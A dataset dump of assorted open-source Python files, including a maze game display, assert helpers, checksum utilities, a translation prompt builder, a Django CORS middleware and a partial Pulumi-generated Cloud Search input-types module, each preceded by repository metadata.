1a54b918c75b8f6851f014b049727a99f83a5fe1 | 925 | py | Python | display_functions.py | JackGartner/MazeGame | cd055f7cb17cc25f0eb20b1adb747b710ca9f9bf | [
"MIT"
] | null | null | null | display_functions.py | JackGartner/MazeGame | cd055f7cb17cc25f0eb20b1adb747b710ca9f9bf | [
"MIT"
] | null | null | null | display_functions.py | JackGartner/MazeGame | cd055f7cb17cc25f0eb20b1adb747b710ca9f9bf | [
"MIT"
] | null | null | null | ############# constants
TITLE = "Cheese Maze"
DEVELOPER = "Jack Gartner"
HISTORY = "A mouse wants to eat his cheese. Make it to the hashtag to win, watch out for plus signs, $ is a teleport, P is a power up. Obtain the Key (K) in order to unlock the door (D)"
INSTRUCTIONS = "left arrow key\t\t\tto move left\nright arrow key\t\t\tto move right\nup arrow key\t\t\tto move up\ndown arrow key\t\t\tto move down\npress q\t\t\t\t\tto quit"
############# functions
def displayTitle():
print(TITLE)
print("By " + DEVELOPER)
print()
print(HISTORY)
print()
print(INSTRUCTIONS)
print()
def displayBoard():
print("-----------------")
print("| +\033[36mK\033[37m + \033[33mP\033[37m|")
print("|\033[32m#\033[37m \033[31mD\033[37m + |")
print("|++++ ++++++ |")
print("| + |")
print("| ++++++ +++++|")
print("| \033[34m$\033[37m|")
print("-----------------")
| 31.896552 | 183 | 0.56 | 131 | 925 | 3.954198 | 0.48855 | 0.027027 | 0.048263 | 0.07722 | 0.131274 | 0.131274 | 0 | 0 | 0 | 0 | 0 | 0.068027 | 0.205405 | 925 | 28 | 184 | 33.035714 | 0.636735 | 0.020541 | 0 | 0.238095 | 0 | 0.095238 | 0.650342 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0 | 0 | 0.095238 | 0.714286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
1a639776c741dfa1f4d1cbf2f51170beef3a28d8 | 1,537 | py | Python | concrete/common/debugging/custom_assert.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 96 | 2022-01-12T15:07:50.000Z | 2022-03-16T04:00:09.000Z | concrete/common/debugging/custom_assert.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 10 | 2022-02-04T16:26:37.000Z | 2022-03-25T14:08:01.000Z | concrete/common/debugging/custom_assert.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 8 | 2022-01-12T15:07:55.000Z | 2022-03-05T00:46:16.000Z | """Provide some variants of assert."""
def _custom_assert(condition: bool, on_error_msg: str = "") -> None:
    """Provide a custom assert which is kept even if the optimized python mode is used.

    See https://docs.python.org/3/reference/simple_stmts.html#assert for the documentation
    on the classical assert statement.

    Args:
        condition(bool): the condition. If False, raise AssertionError
        on_error_msg(str): optional message describing the error
    """
    if not condition:
        raise AssertionError(on_error_msg)


def assert_true(condition: bool, on_error_msg: str = ""):
    """Provide a custom assert to check that the condition is True.

    Args:
        condition(bool): the condition. If False, raise AssertionError
        on_error_msg(str): optional message describing the error
    """
    return _custom_assert(condition, on_error_msg)


def assert_false(condition: bool, on_error_msg: str = ""):
    """Provide a custom assert to check that the condition is False.

    Args:
        condition(bool): the condition. If True, raise AssertionError
        on_error_msg(str): optional message describing the error
    """
    return _custom_assert(not condition, on_error_msg)


def assert_not_reached(on_error_msg: str):
    """Provide a custom assert to check that a piece of code is never reached.

    Args:
        on_error_msg(str): message describing the error
    """
    return _custom_assert(False, on_error_msg)
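A brief usage sketch (assert_true's body is repeated inline so the snippet runs on its own): because the check is an ordinary function call rather than an `assert` statement, `python -O`, which strips assert statements, cannot remove it.

```python
def assert_true(condition: bool, on_error_msg: str = ""):
    if not condition:
        raise AssertionError(on_error_msg)

try:
    assert_true(1 + 1 == 3, "math is broken")
except AssertionError as exc:
    message = str(exc)  # the on_error_msg passed above
```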
# File: third_party/gsutil/third_party/rsa/tests/test_parallel.py (repo: tingshao/catapult, license: BSD-3-Clause)
"""Test for multiprocess prime generation."""
import unittest

import rsa.prime
import rsa.parallel
import rsa.common


class ParallelTest(unittest.TestCase):
    """Tests for multiprocess prime generation."""

    def test_parallel_primegen(self):
        p = rsa.parallel.getprime(1024, 3)

        self.assertFalse(rsa.prime.is_prime(p - 1))
        self.assertTrue(rsa.prime.is_prime(p))
        self.assertFalse(rsa.prime.is_prime(p + 1))

        self.assertEqual(1024, rsa.common.bit_size(p))
# File: downloadutil/checksum_util.py (repo: yugabyte/downloadutil, license: Apache-2.0)
import os
from downloadutil.util import BUFFER_SIZE_BYTES
from typing import Any
import re
import hashlib

SHA256_CHECKSUM_RE = re.compile(r'^[0-9a-f]{64}$')
SHA256_CHECKSUM_FILE_SUFFIX = '.sha256'


def validate_sha256sum(checksum_str: str) -> None:
    """
    Validates the given SHA256 checksum. Raises an exception if it is invalid.
    """
    if not SHA256_CHECKSUM_RE.match(checksum_str):
        raise ValueError(
            "Invalid SHA256 checksum: '%s', expected 64 hex characters" % checksum_str)


def update_hash_with_file(hash: Any, filename: str, block_size: int = BUFFER_SIZE_BYTES) -> str:
    """
    Compute the hash sum of a file by updating the existing hash object.
    """
    # TODO: use a more precise argument type for hash.
    with open(filename, "rb") as f:
        for block in iter(lambda: f.read(block_size), b""):
            hash.update(block)
    return hash.hexdigest()


def compute_file_sha256(path: str) -> str:
    return update_hash_with_file(hashlib.sha256(), path)


def compute_string_sha256(s: str) -> str:
    hash = hashlib.sha256()
    hash.update(s.encode('utf-8'))
    return hash.hexdigest()


def parse_sha256_from_file(checksum_file_contents: str) -> str:
    sha256_from_file = checksum_file_contents.strip().split()[0]
    validate_sha256sum(sha256_from_file)
    return sha256_from_file


def read_sha256_from_file(checksum_file_path: str) -> str:
    with open(checksum_file_path) as checksum_file:
        return parse_sha256_from_file(checksum_file.readline())


def get_sha256_file_path_or_url(original_path_or_url: str) -> str:
    if original_path_or_url.endswith(SHA256_CHECKSUM_FILE_SUFFIX):
        raise ValueError(
            f"File path or URL already ends with {SHA256_CHECKSUM_FILE_SUFFIX}: "
            f"{original_path_or_url}, will not add the same suffix again.")
    return original_path_or_url + SHA256_CHECKSUM_FILE_SUFFIX
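As a quick sanity check, here is compute_string_sha256 repeated as a self-contained copy so the snippet runs standalone; SHA-256 of "abc" is a published FIPS 180-2 test vector, and the result also satisfies the 64-hex-character pattern that validate_sha256sum enforces.

```python
import hashlib

def compute_string_sha256(s: str) -> str:
    h = hashlib.sha256()
    h.update(s.encode('utf-8'))
    return h.hexdigest()

digest = compute_string_sha256("abc")
# Expected: ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
```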
# File: matilda/data_pipeline/data_scapers/__init__.py (repo: AlainDaccache/Quantropy, license: MIT)
import os
from matilda import config
if not os.path.exists(config.DATA_DIR_PATH):
    os.mkdir(config.DATA_DIR_PATH)

if not os.path.exists(config.STOCK_PRICES_DIR_PATH):
    os.mkdir(config.STOCK_PRICES_DIR_PATH)

if not os.path.exists(config.FINANCIAL_STATEMENTS_DIR_PATH):
    os.mkdir(config.FINANCIAL_STATEMENTS_DIR_PATH)

if not os.path.exists(config.FACTORS_DIR_PATH):
    os.mkdir(config.FACTORS_DIR_PATH)

if not os.path.exists(os.path.join(config.FACTORS_DIR_PATH, 'pickle')):
    os.mkdir(os.path.join(config.FACTORS_DIR_PATH, 'pickle'))

if not os.path.exists(config.MARKET_DATA_DIR_PATH):
    os.mkdir(config.MARKET_DATA_DIR_PATH)

if not os.path.exists(config.MARKET_EXCHANGES_DIR_PATH):
    os.mkdir(config.MARKET_EXCHANGES_DIR_PATH)

if not os.path.exists(config.MARKET_INDICES_DIR_PATH):
    os.mkdir(config.MARKET_INDICES_DIR_PATH)
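The repeated exists/mkdir checks above could be collapsed into a loop; `os.makedirs(..., exist_ok=True)` is idempotent and also creates intermediate directories, so nested paths like factors/pickle need no separate parent check. A sketch using temporary stand-in paths instead of the project's `config.*_DIR_PATH` constants:

```python
import os
import tempfile

def ensure_dirs(*paths):
    """Create every path (including parents); existing directories are fine."""
    for path in paths:
        os.makedirs(path, exist_ok=True)

base = tempfile.mkdtemp()  # illustrative base directory
ensure_dirs(
    os.path.join(base, "stock_prices"),
    os.path.join(base, "factors", "pickle"),
)
```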
# File: argostranslate/fewshot.py (repo: argosopentechnologies/Argos-Translate, license: MIT)
prompt = """Translate to French (fr)
From English (es)
==========
Bramshott is a village with mediaeval origins in the East Hampshire district of Hampshire, England. It lies 0.9 miles (1.4 km) north of Liphook. The nearest railway station, Liphook, is 1.3 miles (2.1 km) south of the village.
----------
Bramshott est un village avec des origines médiévales dans le quartier East Hampshire de Hampshire, en Angleterre. Il se trouve à 0,9 miles (1,4 km) au nord de Liphook. La gare la plus proche, Liphook, est à 1,3 km (2,1 km) au sud du village.
==========
Translate to Russian (rs)
From German (de)
==========
Der Gewöhnliche Strandhafer (Ammophila arenaria (L.) Link; Syn: Calamagrostis arenaria (L.) Roth) – auch als Gemeiner Strandhafer, Sandrohr, Sandhalm, Seehafer oder Helm (niederdeutsch) bezeichnet – ist eine zur Familie der Süßgräser (Poaceae) gehörige Pionierpflanze.
----------
Обычная пляжная овсянка (аммофила ареалия (л.) соединение; сина: каламагростисная анария (л.) Рот, также называемая обычной пляжной овцой, песчаной, сандалмой, морской орой или шлемом (нижний немецкий) - это кукольная станция, принадлежащая семье сладких трав (поа).
==========
"""
def generate_prompt(text, from_name, from_code, to_name, to_code):
    # TODO: document
    to_return = prompt
    to_return += "Translate to "
    if from_name:
        to_return += from_name
    if from_code:
        to_return += " (" + from_code + ")"
    to_return += "\nFrom "
    if to_name:
        to_return += to_name
    if to_code:  # was `if from_code`, which guarded the wrong variable
        to_return += " (" + to_code + ")"
    to_return += "\n" + "=" * 10 + "\n"
    to_return += text
    to_return += "\n" + "-" * 10 + "\n"
    return to_return


def parse_inference(output):
    end_index = output.find("=" * 10)
    if end_index != -1:
        return output[:end_index]  # slice up to the delimiter, not a single char
    end_index = output.find("-" * 10)
    if end_index != -1:
        return output[:end_index]
    return output
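For illustration, a standalone sketch of the delimiter-trimming behaviour: keep only the text before the first "=" or "-" delimiter row of a raw few-shot completion. `trim_completion` is a hypothetical name, not part of the module above.

```python
def trim_completion(output):
    """Return the text before the first delimiter row, or the whole string."""
    for delimiter in ("=" * 10, "-" * 10):
        end_index = output.find(delimiter)
        if end_index != -1:
            return output[:end_index]
    return output

raw = "Bonjour le monde\n==========\nTranslate to German (de)"
parsed = trim_completion(raw)  # "Bonjour le monde\n"
```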
# File: 1_beginner/chapter5/practice/fibonnaci.py (repo: code4tomorrow/Python, license: MIT)
""" CHALLENGE PROBLEM!! NOT FOR THE FAINT OF HEART!
The Fibonacci numbers, discovered by Leonardo di Fibonacci,
is a sequence of numbers that often shows up in mathematics and,
interestingly, nature. The sequence goes as such:
1,1,2,3,5,8,13,21,34,55,...
where the sequence starts with 1 and 1, and then each number is the sum of the
previous 2. For example, 8 comes after 5 because 5+3 = 8, and 55 comes after 34
because 34+21 = 55.
The challenge is to use a for loop (not recursion, if you know what that is),
to find the 100th Fibonacci number.
"""
# write code here
# Can you do it with a while loop?
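One possible solution sketch for the challenge (spoiler, skip it if you want to solve it yourself): keep only the two most recent numbers of the sequence and update them inside a for loop.

```python
def fibonacci(n):
    """Return the n-th Fibonacci number, 1-indexed (fibonacci(1) == 1)."""
    a, b = 1, 1
    for _ in range(n - 2):
        a, b = b, a + b
    return b

print(fibonacci(100))  # the 100th Fibonacci number
```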
# File: src/main/python/smv/__init__.py (repo: shuangshuangwang/SMV, license: Apache-2.0)
# flake8: noqa
# Smv DataSet Framework
from smv.smvdataset import *
from smv.smvinput import *
from smv.smvapp import SmvApp
from smv.runconfig import SmvRunConfig
from smv.csv_attributes import CsvAttributes
from smv.helpers import SmvGroupedData
from smv.historical_validators import SmvHistoricalValidator, SmvHistoricalValidators
# keep old py names for backwards compatibility
SmvPyCsvFile = SmvCsvFile
SmvPyModule = SmvModule
SmvPyOutput = SmvOutput
SmvPyModuleLink = SmvModuleLink
# File: api/middlewares/cors.py (repo: lndba/apasa_backend, license: Apache-2.0)
from django.utils.deprecation import MiddlewareMixin
from django.conf import settings
class Cors(MiddlewareMixin):
    def process_response(self, request, response):
        response['Access-Control-Allow-Origin'] = ','.join(settings.CORS_ORIGIN_LIST)
        if request.method == 'OPTIONS':
            response['Access-Control-Allow-Methods'] = ','.join(settings.CORS_METHOD_LIST)
            response['Access-Control-Allow-Headers'] = ','.join(settings.CORS_HEADER_LIST)
            response['Access-Control-Allow-Credentials'] = 'true'
        return response
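The middleware reads three custom list settings. A hypothetical Django settings fragment it expects; the setting names come from the code above, the values are illustrative only:

```python
CORS_ORIGIN_LIST = ["https://example.com", "https://app.example.com"]
CORS_METHOD_LIST = ["GET", "POST", "PUT", "DELETE", "OPTIONS"]
CORS_HEADER_LIST = ["Content-Type", "Authorization"]

# The middleware joins each list into one comma-separated header value:
origin_header = ",".join(CORS_ORIGIN_LIST)
```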
# File: target_decisioning_engine/filters.py (repo: adobe/target-python-sdk, license: Apache-2.0)
# Copyright 2021 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""filters"""
from target_tools.utils import is_empty
def by_property_token(property_token):
    """
    :param property_token: (str) property token, required
    :return: (callable) Returns filter predicate
    """

    def _filter(rule):
        """
        :param rule: (target_decisioning_engine.types.decisioning_artifact.Rule) rule
        :return: (bool)
        """
        property_tokens = rule.get("propertyTokens", [])
        return is_empty(property_tokens) if not property_token else \
            (is_empty(property_tokens) or property_token in property_tokens)

    return _filter
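A usage sketch with hypothetical rules. `is_empty` here is a minimal stand-in for `target_tools.utils.is_empty`, and `by_property_token` mirrors the definition above so the snippet runs standalone: rules with no property tokens pass any token filter, while rules with tokens pass only when the token matches.

```python
def is_empty(collection):
    return len(collection) == 0

def by_property_token(property_token):
    def _filter(rule):
        property_tokens = rule.get("propertyTokens", [])
        return is_empty(property_tokens) if not property_token else \
            (is_empty(property_tokens) or property_token in property_tokens)
    return _filter

rules = [
    {"propertyTokens": []},              # no tokens: passes any token filter
    {"propertyTokens": ["abc", "def"]},  # passes only for "abc" or "def"
]
matching = list(filter(by_property_token("abc"), rules))  # both rules pass
```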
# File: devilry/devilry_dbcache/devilry_dbcache_testapp/models.py (repo: aless80/devilry-django, license: BSD-3-Clause)
from django.db import models
from devilry.devilry_dbcache.bulk_create_queryset_mixin import BulkCreateQuerySetMixin
class PersonQuerySet(models.QuerySet, BulkCreateQuerySetMixin):
    pass


class Person(models.Model):
    objects = PersonQuerySet.as_manager()
    name = models.TextField()
    age = models.IntegerField(default=20)
# File: sdk/python/pulumi_google_native/cloudsearch/v1/_inputs.py (repo: AaronFriel/pulumi-google-native, license: Apache-2.0)
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
    'CompositeFilterArgs',
    'DataSourceRestrictionArgs',
    'DateArgs',
    'FacetOptionsArgs',
    'FilterOptionsArgs',
    'FilterArgs',
    'GSuitePrincipalArgs',
    'QueryInterpretationConfigArgs',
    'ScoringConfigArgs',
    'SortOptionsArgs',
    'SourceConfigArgs',
    'SourceCrowdingConfigArgs',
    'SourceScoringConfigArgs',
    'SourceArgs',
    'ValueFilterArgs',
    'ValueArgs',
]
@pulumi.input_type
class CompositeFilterArgs:
    def __init__(__self__, *,
                 logic_operator: Optional[pulumi.Input['CompositeFilterLogicOperator']] = None,
                 sub_filters: Optional[pulumi.Input[Sequence[pulumi.Input['FilterArgs']]]] = None):
        """
        :param pulumi.Input['CompositeFilterLogicOperator'] logic_operator: The logic operator of the sub filter.
        :param pulumi.Input[Sequence[pulumi.Input['FilterArgs']]] sub_filters: Sub filters.
        """
        if logic_operator is not None:
            pulumi.set(__self__, "logic_operator", logic_operator)
        if sub_filters is not None:
            pulumi.set(__self__, "sub_filters", sub_filters)

    @property
    @pulumi.getter(name="logicOperator")
    def logic_operator(self) -> Optional[pulumi.Input['CompositeFilterLogicOperator']]:
        """
        The logic operator of the sub filter.
        """
        return pulumi.get(self, "logic_operator")

    @logic_operator.setter
    def logic_operator(self, value: Optional[pulumi.Input['CompositeFilterLogicOperator']]):
        pulumi.set(self, "logic_operator", value)

    @property
    @pulumi.getter(name="subFilters")
    def sub_filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FilterArgs']]]]:
        """
        Sub filters.
        """
        return pulumi.get(self, "sub_filters")

    @sub_filters.setter
    def sub_filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FilterArgs']]]]):
        pulumi.set(self, "sub_filters", value)
@pulumi.input_type
class DataSourceRestrictionArgs:
    def __init__(__self__, *,
                 filter_options: Optional[pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]]] = None,
                 source: Optional[pulumi.Input['SourceArgs']] = None):
        """
        Restriction on Datasource.
        :param pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]] filter_options: Filter options restricting the results. If multiple filters are present, they are grouped by object type before joining. Filters with the same object type are joined conjunctively, then the resulting expressions are joined disjunctively. The maximum number of elements is 20. NOTE: Suggest API supports only few filters at the moment: "objecttype", "type" and "mimetype". For now, schema specific filters cannot be used to filter suggestions.
        :param pulumi.Input['SourceArgs'] source: The source of restriction.
        """
        if filter_options is not None:
            pulumi.set(__self__, "filter_options", filter_options)
        if source is not None:
            pulumi.set(__self__, "source", source)

    @property
    @pulumi.getter(name="filterOptions")
    def filter_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]]]:
        """
        Filter options restricting the results. If multiple filters are present, they are grouped by object type before joining. Filters with the same object type are joined conjunctively, then the resulting expressions are joined disjunctively. The maximum number of elements is 20. NOTE: Suggest API supports only few filters at the moment: "objecttype", "type" and "mimetype". For now, schema specific filters cannot be used to filter suggestions.
        """
        return pulumi.get(self, "filter_options")

    @filter_options.setter
    def filter_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FilterOptionsArgs']]]]):
        pulumi.set(self, "filter_options", value)

    @property
    @pulumi.getter
    def source(self) -> Optional[pulumi.Input['SourceArgs']]:
        """
        The source of restriction.
        """
        return pulumi.get(self, "source")

    @source.setter
    def source(self, value: Optional[pulumi.Input['SourceArgs']]):
        pulumi.set(self, "source", value)
@pulumi.input_type
class DateArgs:
    def __init__(__self__, *,
                 day: Optional[pulumi.Input[int]] = None,
                 month: Optional[pulumi.Input[int]] = None,
                 year: Optional[pulumi.Input[int]] = None):
        """
        Represents a whole calendar date, for example a date of birth. The time of day and time zone are either specified elsewhere or are not significant. The date is relative to the [Proleptic Gregorian Calendar](https://en.wikipedia.org/wiki/Proleptic_Gregorian_calendar). The date must be a valid calendar date between the year 1 and 9999.
        :param pulumi.Input[int] day: Day of month. Must be from 1 to 31 and valid for the year and month.
        :param pulumi.Input[int] month: Month of date. Must be from 1 to 12.
        :param pulumi.Input[int] year: Year of date. Must be from 1 to 9999.
        """
        if day is not None:
            pulumi.set(__self__, "day", day)
        if month is not None:
            pulumi.set(__self__, "month", month)
        if year is not None:
            pulumi.set(__self__, "year", year)

    @property
    @pulumi.getter
    def day(self) -> Optional[pulumi.Input[int]]:
        """
        Day of month. Must be from 1 to 31 and valid for the year and month.
        """
        return pulumi.get(self, "day")

    @day.setter
    def day(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "day", value)

    @property
    @pulumi.getter
    def month(self) -> Optional[pulumi.Input[int]]:
        """
        Month of date. Must be from 1 to 12.
        """
        return pulumi.get(self, "month")

    @month.setter
    def month(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "month", value)

    @property
    @pulumi.getter
    def year(self) -> Optional[pulumi.Input[int]]:
        """
        Year of date. Must be from 1 to 9999.
        """
        return pulumi.get(self, "year")

    @year.setter
    def year(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "year", value)
@pulumi.input_type
class FacetOptionsArgs:
    def __init__(__self__, *,
                 num_facet_buckets: Optional[pulumi.Input[int]] = None,
                 object_type: Optional[pulumi.Input[str]] = None,
                 operator_name: Optional[pulumi.Input[str]] = None,
                 source_name: Optional[pulumi.Input[str]] = None):
        """
        Specifies operators to return facet results for. There will be one FacetResult for every source_name/object_type/operator_name combination.
        :param pulumi.Input[int] num_facet_buckets: Maximum number of facet buckets that should be returned for this facet. Defaults to 10. Maximum value is 100.
        :param pulumi.Input[str] object_type: If object_type is set, only those objects of that type will be used to compute facets. If empty, then all objects will be used to compute facets.
        :param pulumi.Input[str] operator_name: Name of the operator chosen for faceting. @see cloudsearch.SchemaPropertyOptions
        :param pulumi.Input[str] source_name: Source name to facet on. Format: datasources/{source_id} If empty, all data sources will be used.
        """
        if num_facet_buckets is not None:
            pulumi.set(__self__, "num_facet_buckets", num_facet_buckets)
        if object_type is not None:
            pulumi.set(__self__, "object_type", object_type)
        if operator_name is not None:
            pulumi.set(__self__, "operator_name", operator_name)
        if source_name is not None:
            pulumi.set(__self__, "source_name", source_name)

    @property
    @pulumi.getter(name="numFacetBuckets")
    def num_facet_buckets(self) -> Optional[pulumi.Input[int]]:
        """
        Maximum number of facet buckets that should be returned for this facet. Defaults to 10. Maximum value is 100.
        """
        return pulumi.get(self, "num_facet_buckets")

    @num_facet_buckets.setter
    def num_facet_buckets(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "num_facet_buckets", value)

    @property
    @pulumi.getter(name="objectType")
    def object_type(self) -> Optional[pulumi.Input[str]]:
        """
        If object_type is set, only those objects of that type will be used to compute facets. If empty, then all objects will be used to compute facets.
        """
        return pulumi.get(self, "object_type")

    @object_type.setter
    def object_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "object_type", value)

    @property
    @pulumi.getter(name="operatorName")
    def operator_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the operator chosen for faceting. @see cloudsearch.SchemaPropertyOptions
        """
        return pulumi.get(self, "operator_name")

    @operator_name.setter
    def operator_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "operator_name", value)

    @property
    @pulumi.getter(name="sourceName")
    def source_name(self) -> Optional[pulumi.Input[str]]:
        """
        Source name to facet on. Format: datasources/{source_id} If empty, all data sources will be used.
        """
        return pulumi.get(self, "source_name")

    @source_name.setter
    def source_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "source_name", value)
@pulumi.input_type
class FilterOptionsArgs:
    def __init__(__self__, *,
                 filter: Optional[pulumi.Input['FilterArgs']] = None,
                 object_type: Optional[pulumi.Input[str]] = None):
        """
        Filter options to be applied on query.
        :param pulumi.Input['FilterArgs'] filter: Generic filter to restrict the search, such as `lang:en`, `site:xyz`.
        :param pulumi.Input[str] object_type: If object_type is set, only objects of that type are returned. This should correspond to the name of the object that was registered within the definition of schema. The maximum length is 256 characters.
        """
        if filter is not None:
            pulumi.set(__self__, "filter", filter)
        if object_type is not None:
            pulumi.set(__self__, "object_type", object_type)

    @property
    @pulumi.getter
    def filter(self) -> Optional[pulumi.Input['FilterArgs']]:
        """
        Generic filter to restrict the search, such as `lang:en`, `site:xyz`.
        """
        return pulumi.get(self, "filter")

    @filter.setter
    def filter(self, value: Optional[pulumi.Input['FilterArgs']]):
        pulumi.set(self, "filter", value)

    @property
    @pulumi.getter(name="objectType")
    def object_type(self) -> Optional[pulumi.Input[str]]:
        """
        If object_type is set, only objects of that type are returned. This should correspond to the name of the object that was registered within the definition of schema. The maximum length is 256 characters.
        """
        return pulumi.get(self, "object_type")

    @object_type.setter
    def object_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "object_type", value)
@pulumi.input_type
class FilterArgs:
    def __init__(__self__, *,
                 composite_filter: Optional[pulumi.Input['CompositeFilterArgs']] = None,
                 value_filter: Optional[pulumi.Input['ValueFilterArgs']] = None):
        """
        A generic way of expressing filters in a query, which supports two approaches: **1. Setting a ValueFilter.** The name must match an operator_name defined in the schema for your data source. **2. Setting a CompositeFilter.** The filters are evaluated using the logical operator. The top-level operators can only be either an AND or a NOT. AND can appear only at the top-most level. OR can appear only under a top-level AND.
        """
        if composite_filter is not None:
            pulumi.set(__self__, "composite_filter", composite_filter)
        if value_filter is not None:
            pulumi.set(__self__, "value_filter", value_filter)

    @property
    @pulumi.getter(name="compositeFilter")
    def composite_filter(self) -> Optional[pulumi.Input['CompositeFilterArgs']]:
        return pulumi.get(self, "composite_filter")

    @composite_filter.setter
    def composite_filter(self, value: Optional[pulumi.Input['CompositeFilterArgs']]):
        pulumi.set(self, "composite_filter", value)

    @property
    @pulumi.getter(name="valueFilter")
    def value_filter(self) -> Optional[pulumi.Input['ValueFilterArgs']]:
        return pulumi.get(self, "value_filter")

    @value_filter.setter
    def value_filter(self, value: Optional[pulumi.Input['ValueFilterArgs']]):
        pulumi.set(self, "value_filter", value)
@pulumi.input_type
class GSuitePrincipalArgs:
    def __init__(__self__, *,
                 gsuite_domain: Optional[pulumi.Input[bool]] = None,
                 gsuite_group_email: Optional[pulumi.Input[str]] = None,
                 gsuite_user_email: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[bool] gsuite_domain: This principal represents all users of the G Suite domain of the customer.
        :param pulumi.Input[str] gsuite_group_email: This principal references a G Suite group account
        :param pulumi.Input[str] gsuite_user_email: This principal references a G Suite user account
        """
        if gsuite_domain is not None:
            pulumi.set(__self__, "gsuite_domain", gsuite_domain)
        if gsuite_group_email is not None:
            pulumi.set(__self__, "gsuite_group_email", gsuite_group_email)
        if gsuite_user_email is not None:
            pulumi.set(__self__, "gsuite_user_email", gsuite_user_email)

    @property
    @pulumi.getter(name="gsuiteDomain")
    def gsuite_domain(self) -> Optional[pulumi.Input[bool]]:
        """
        This principal represents all users of the G Suite domain of the customer.
        """
        return pulumi.get(self, "gsuite_domain")

    @gsuite_domain.setter
    def gsuite_domain(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "gsuite_domain", value)

    @property
    @pulumi.getter(name="gsuiteGroupEmail")
    def gsuite_group_email(self) -> Optional[pulumi.Input[str]]:
        """
        This principal references a G Suite group account
        """
        return pulumi.get(self, "gsuite_group_email")

    @gsuite_group_email.setter
    def gsuite_group_email(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "gsuite_group_email", value)

    @property
    @pulumi.getter(name="gsuiteUserEmail")
    def gsuite_user_email(self) -> Optional[pulumi.Input[str]]:
        """
        This principal references a G Suite user account
        """
        return pulumi.get(self, "gsuite_user_email")

    @gsuite_user_email.setter
    def gsuite_user_email(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "gsuite_user_email", value)
@pulumi.input_type
class QueryInterpretationConfigArgs:
def __init__(__self__, *,
force_disable_supplemental_results: Optional[pulumi.Input[bool]] = None,
force_verbatim_mode: Optional[pulumi.Input[bool]] = None):
"""
Default options to interpret user query.
:param pulumi.Input[bool] force_disable_supplemental_results: Set this flag to disable supplemental results retrieval, setting a flag here will not retrieve supplemental results for queries associated with a given search application. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for supplemental results.
:param pulumi.Input[bool] force_verbatim_mode: Enable this flag to turn off all internal optimizations like natural language (NL) interpretation of queries, supplemental results retrieval, and usage of synonyms including custom ones. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for verbatim mode.
"""
if force_disable_supplemental_results is not None:
pulumi.set(__self__, "force_disable_supplemental_results", force_disable_supplemental_results)
if force_verbatim_mode is not None:
pulumi.set(__self__, "force_verbatim_mode", force_verbatim_mode)
@property
@pulumi.getter(name="forceDisableSupplementalResults")
def force_disable_supplemental_results(self) -> Optional[pulumi.Input[bool]]:
"""
Set this flag to disable supplemental results retrieval, setting a flag here will not retrieve supplemental results for queries associated with a given search application. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for supplemental results.
"""
return pulumi.get(self, "force_disable_supplemental_results")
@force_disable_supplemental_results.setter
def force_disable_supplemental_results(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_disable_supplemental_results", value)
@property
@pulumi.getter(name="forceVerbatimMode")
def force_verbatim_mode(self) -> Optional[pulumi.Input[bool]]:
"""
Enable this flag to turn off all internal optimizations like natural language (NL) interpretation of queries, supplemental results retrieval, and usage of synonyms including custom ones. If this flag is set to True, it will take precedence over the option set at Query level. For the default value of False, query level flag will set the correct interpretation for verbatim mode.
"""
return pulumi.get(self, "force_verbatim_mode")
@force_verbatim_mode.setter
def force_verbatim_mode(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_verbatim_mode", value)
@pulumi.input_type
class ScoringConfigArgs:
def __init__(__self__, *,
disable_freshness: Optional[pulumi.Input[bool]] = None,
disable_personalization: Optional[pulumi.Input[bool]] = None):
"""
Scoring configurations for a source while processing a Search or Suggest request.
:param pulumi.Input[bool] disable_freshness: Whether to use freshness as a ranking signal. By default, freshness is used as a ranking signal. Note that this setting is not available in the Admin UI.
